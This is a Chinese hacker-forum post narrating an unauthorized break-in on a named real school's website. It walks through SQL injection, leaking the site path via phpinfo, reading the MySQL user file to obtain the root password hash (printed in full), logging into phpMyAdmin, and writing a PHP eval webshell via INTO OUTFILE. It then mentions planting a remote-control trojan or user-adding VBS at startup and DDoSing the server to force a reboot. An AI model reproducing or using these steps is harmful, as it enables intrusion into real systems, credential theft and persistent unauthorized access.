找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3194|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏4 ^: P2 ]4 M5 T3 p
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!3 ?8 w9 Y4 x" S! x0 g4 [
9 v: d3 V0 Q% j7 l

. D. e+ j5 {3 \( U) X
9 }' S7 L# t2 N8 _+ Z& B9 W常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 . S" K/ s+ j7 _% p. Q% H) b
4 t' @) k7 \( d& F9 W" [
那么想可以直接写入shell ,getshell有几个条件:$ E, O4 ]" J" i) @1 K
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF4 f1 d$ K6 p( ]3 `' U8 c

) D& F6 M" _7 f; {试着爆绝对路径:
$ z) |  H+ r4 ~1./phpMyAdmin/index.php?lang[]=1  
! M6 U# X+ B' d9 F. O" h2./phpMyAdmin/phpinfo.php  
' I  @, M/ C" Z! r3 z$ E6 t( ]4 d3./load_file()  
6 P& P, ^$ H8 a0 m+ m; L3 |! \8 P4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
  d, c! d  q: L# z& _; z5./phpmyadmin/libraries/select_lang.lib.php  
: }  S2 ~2 o* P' k1 U6./phpmyadmin/libraries/lect_lang.lib.php  
& }( Z& G% j3 U# c$ Q! T7./phpmyadmin/libraries/mcrypt.lib.php   
- C0 u3 A: ^8 [( t8./phpmyadmin/libraries/export/xls.php  ! M, B3 ]: J6 \5 y

8 @7 \- L* g4 l" \  D* c0 v均不行...........................
( F8 D6 _' q2 O* b7 {% S% l6 S$ i9 m5 d8 {) C
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php+ p) o. B# a! K9 K

0 |/ I1 v" v/ m# @. G" l9 r权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 7 F: J8 f: c7 O* d& V

2 o$ g! H+ P# m( O# e3 G. A5 [; I  O默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败* R3 s! _) o9 G0 [* W& S8 j. Y
" N$ e. O/ M8 K$ T
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
9 t$ W3 |+ i3 T: S8 |1 e: P
& [2 [" w  l' n7 l想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : H, y9 c" \7 p: C9 M
1 V3 [9 y  L5 @, k+ d
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini : g/ J% z1 R3 Y3 r0 C6 ]

* {3 z' |7 D/ V( X# x自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD : T; G4 c5 {  H# |
0 z( K: @; V- c3 I* c
成功读到root密码:
3 V! |$ V' m. q& |, Y' q) S- X( g! m1 U( {( M( o
17---- r(0072)% j4 o  C" b4 c. U6 S1 M
18---- o(006f)7 @' u4 [- R/ W& l
19---- o(006f)3 U6 ^# Z: B4 a7 _
20---- t(0074)
0 r( d) Y; T' f* t21---- *(002a)$ D7 ]4 W8 u+ v0 m
22---- 8(0038)1 T2 s  c( g/ H6 n) R
23---- 2(0032); D9 V( U# Q* K
24---- E(0045)9 K6 t% W" E" @$ ]2 {6 h& Q/ T
25---- 1(0031), ~7 ^, i4 r4 W/ e8 A) N& Q& H# q6 d( J
26---- C(0043)& l. j, Q7 \5 V$ o
27---- 5(0035)+ \: b+ ^3 ^0 l9 O2 ]
28---- 8(0038)# ~, t$ m. x, Q* M! W/ ^+ S
29---- 2(0032)
" h7 |0 y2 f/ Q# t30---- 8(0038)
$ o/ T! H0 _' o$ Q4 c" o31---- A(0041)5 w1 n1 y# ]: Q
32---- 9(0039)4 A( ^9 ^; F, q/ x
33---- B(0042)7 C. g% g: A+ v. O5 M+ N
34---- 5(0035): W/ K! w/ h7 S- y& ^% D& L7 a2 V
35---- 4(0034)
5 P* x( S9 [" ~/ G$ h, h36---- 8(0038)9 j9 x7 O! Z* P6 B* d6 I2 c
37---- 6(0036)6 h7 q" n. Y( O  B
38---- 4(0034)
! u# T- t) T1 V3 g+ S9 S, L3 m39---- 9(0039)( P8 r; U2 C7 a
40---- 1(0031)% Y0 T1 O+ n6 F) p" Q
41---- 1(0031)
1 D, t( {3 G! s2 O! H42---- 5(0035)( b* {  r# a' \9 |
43---- 3(0033)
! X- `; ?6 k1 Y& X44---- 5(0035)
+ B! u0 K- A+ w45---- 9(0039)2 m) n. B+ V. Z) c4 u! ]) i  e
46---- 8(0038)
2 _7 I+ J8 ]" ?6 s1 _47---- F(0046)
/ p/ }, U& i" M5 [, u+ k48---- F(0046)
/ E  |% m; K) J' E0 ?49---- 4(0034)
, L9 R: k( q, t  x# l. l' S50---- F(0046)
5 v1 ?( z( s% C9 J8 @8 K6 H51---- 0(0030)
' c6 y' C1 X. x, \) a52---- 3(0033)
" j3 F  ~% C$ N7 ^2 b/ @! e53---- 2(0032)2 D, p  H+ I4 [
54---- A(0041)
2 U- M' n( D: X9 D1 N55---- 4(0034)
1 d' Q* H; W8 m: s, s9 J. C56---- A(0041)& s7 g4 z/ d1 ~( k7 U/ |
57---- B(0042)
( r- }2 L! v8 h8 c! e58---- *(0044)
* j- U+ A, |9 G59---- *(0035)
* R1 b& }% x' T) U/ R* `- E$ }; d60---- *(0041)$ h$ M2 p0 X4 d6 I$ n( u+ g- M7 I( v
61---- *0032)8 ]: O# Y0 {* ?. C; D& m

4 P) {& z7 S9 O/ X6 [解密后成功登陆phpmyamin
4 G3 |4 y- n# N1 z" A; u                          
' M! i& h6 g% x# f% A  x, w  e5 e; v( m2 Z: A( ~1 S$ @
                             
; y: s0 `# n; k3 A, M
! t9 V, ~, Q& e2 G( s; C找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 S+ D; v( ^5 |7 S! b% q! p' q: H. O: ?8 `; E% S
成功执行,拿下shell,菜刀连接:
4 J; I5 J, M) O4 Q* q  x6 @% n( q1 R" g) e0 }
服务器不支持asp,aspx,php提权无果...................5 q+ ^9 Q5 {2 D2 g
) M, z3 K1 S% W0 h3 M1 T/ C& ~
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
. \* t5 j. b: [& d3 h4 u) ^- ?
服务器上已经有个隐藏帐号了

7 ^1 N8 S" F  N0 x: ]% @
别名     administrators5 y, n0 \( n, I" j# P! n1 p
注释     管理员对计算机/域有不受限制的完全访问权
* P5 `9 v( Q3 J9 Q) ~4 g
成员

3 t% A  T/ R. U8 u; p
-------------------------------------------------------------------------------
  k, U9 N5 Y5 W, F$ q& Tadmin
$ s, j  p- L8 J' j) F& u. [; sAdministrator
  ?% k. w! O& d) r. \1 Jslipper$- ~4 G  ]& M; G+ H% M1 c
sqluser
0 J  v) F3 I& o命令成功完成。
6 C3 u8 ~/ u( `. U+ q' r/ X3 Y* Q6 v/ b5 E0 I
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。4 [8 @2 H* f2 O4 ]

6 @  h3 L: M& bddos服务器重启,不然就只能坐等服务器重启了...............................0 m7 b% `/ p$ B# b9 D

) ]+ ^5 a3 g/ f# ^/ {      

8 [* A; [4 W4 o# _; _' I

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表